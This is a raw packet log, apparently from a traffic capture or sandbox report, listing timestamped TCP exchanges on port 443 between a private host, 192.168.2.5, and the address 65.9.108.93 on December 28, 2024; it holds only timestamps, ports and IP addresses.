Dec 28, 2024 22:21:15.210593939 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.264195919 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.264213085 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.264329910 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.264364958 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.264420986 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.354990005 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.355007887 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.355118990 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.355160952 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.355217934 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.397099018 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.397118092 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.397207975 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.397228956 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.397293091 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.424633026 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.424671888 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.424767017 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.424793959 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.424849033 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.444242954 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.444259882 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.444338083 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.444359064 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.444425106 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.556037903 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.556060076 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.556267977 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.556310892 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.556421995 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.569461107 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.569475889 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.569643021 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.569665909 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.569766045 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.583157063 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.583173990 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.583236933 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.583257914 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.583306074 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.594633102 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.594733953 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.594791889 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.594821930 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.594861984 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.594861984 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.606311083 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.606332064 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.606429100 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.606467009 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.606523037 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.618788004 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.618805885 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.619079113 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.619096994 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.619199038 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.632293940 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.632318974 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.632540941 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.632555962 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.632635117 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.645657063 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.645673037 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.645735979 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.645757914 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.645895958 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.764203072 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.764234066 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.764337063 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.764364004 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.764403105 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.767688036 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.773575068 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.773592949 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.773672104 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.773688078 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.773746014 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.781555891 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.781573057 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.781651974 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.781666994 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.781728029 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.790738106 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.790755033 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.790824890 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.790839911 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.790889025 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.799834013 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.799850941 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.799918890 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.799933910 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.800004959 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.806385994 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.806443930 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.806473970 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.806485891 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.806529045 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.815135002 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.815151930 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.815229893 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.815248013 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.824196100 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.824212074 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.824280977 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.824316978 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.825562000 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.825623035 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.825637102 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.825684071 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.975440979 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.975461960 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.975722075 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.975775003 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.975825071 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.983308077 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.983340025 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.983503103 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.983503103 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.983541012 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.983638048 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.991470098 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.991488934 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.991559982 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.991590023 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.991632938 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.998466969 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.998497963 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.998564959 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.998589993 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:15.998615026 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:15.998632908 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:16.006676912 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:16.006692886 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:16.006804943 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:16.006829023 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:16.006882906 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:16.014337063 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:16.014353037 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:16.014483929 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:16.014504910 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:16.014607906 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:16.022413969 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:16.022429943 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:16.022504091 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:16.022531986 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:16.022574902 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:16.030546904 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:16.030564070 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:16.030673981 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:16.030716896 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:16.030761957 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:16.185782909 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:16.185810089 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:16.185926914 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:16.186016083 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:16.186074018 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:16.189075947 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:16.189152002 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:16.189157009 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:16.189212084 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:16.189266920 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:16.189321995 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:16.189352036 CET	49838	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:16.189367056 CET	443	49838	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:16.477538109 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:16.477612972 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:16.477741957 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:16.478143930 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:16.478159904 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:18.184628010 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:18.184700966 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:18.186500072 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:18.186511040 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:18.186754942 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:18.188396931 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:18.235336065 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:18.827035904 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:18.873716116 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:18.873735905 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:18.873812914 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:18.873831987 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:18.873881102 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.047777891 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.047861099 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.047882080 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.047902107 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.047945976 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.089466095 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.089502096 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.089731932 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.089767933 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.089822054 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.229641914 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.229674101 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.229712009 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.229728937 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.229777098 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.235845089 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.235909939 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.262986898 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.263012886 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.263056040 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.263070107 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.263103962 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.263117075 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.286294937 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.286319017 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.286369085 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.286387920 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.286417961 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.286432981 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.300173998 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.300235033 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.300240993 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.300262928 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.300297976 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.430696011 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.430720091 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.430762053 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.430780888 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.430818081 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.445091963 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.445120096 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.445157051 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.445171118 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.445228100 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.460135937 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.460160971 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.460205078 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.460218906 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.460268021 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.473012924 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.473037958 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.473083973 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.473097086 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.473155022 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.488046885 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.488073111 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.488128901 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.488143921 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.502984047 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.503011942 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.503046989 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.503065109 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.503113985 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.516889095 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.516912937 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.517009974 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.517034054 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.519124985 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.519172907 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.519186974 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.519224882 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.634527922 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.634555101 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.634609938 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.634624958 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.634675980 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.645488024 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.645507097 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.645571947 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.645586014 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.645627022 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.656858921 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.656884909 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.656949043 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.656976938 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.656992912 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.657018900 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.666456938 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.666485071 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.666562080 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.666574955 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.666676044 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.677582979 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.677607059 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.677648067 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.677661896 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.677689075 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.677716017 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.687899113 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.687925100 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.687964916 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.687987089 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.688005924 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.688025951 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.699120045 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.699143887 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.699203014 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.699227095 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.699253082 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.699266911 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.708811045 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.708863974 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.708921909 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.708940983 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.708969116 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.709966898 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.710182905 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.710233927 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.839234114 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.839266062 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.839382887 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.839416981 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.839462042 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.846833944 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.846853971 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.846935987 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.846965075 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.847004890 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.855518103 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.855535984 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.855612993 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.855622053 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.855665922 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.864166975 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.864187002 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.864264011 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.864293098 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.864341021 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.872894049 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.872911930 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.872991085 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.873019934 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.873070955 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.881041050 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.881063938 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.881133080 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.881155014 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.881205082 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.888639927 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.888657093 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.888735056 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.888762951 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.888812065 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.897381067 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.897397995 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:19.897471905 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:19.897480011 CET	443	49849	65.9.108.93	192.168.2.5
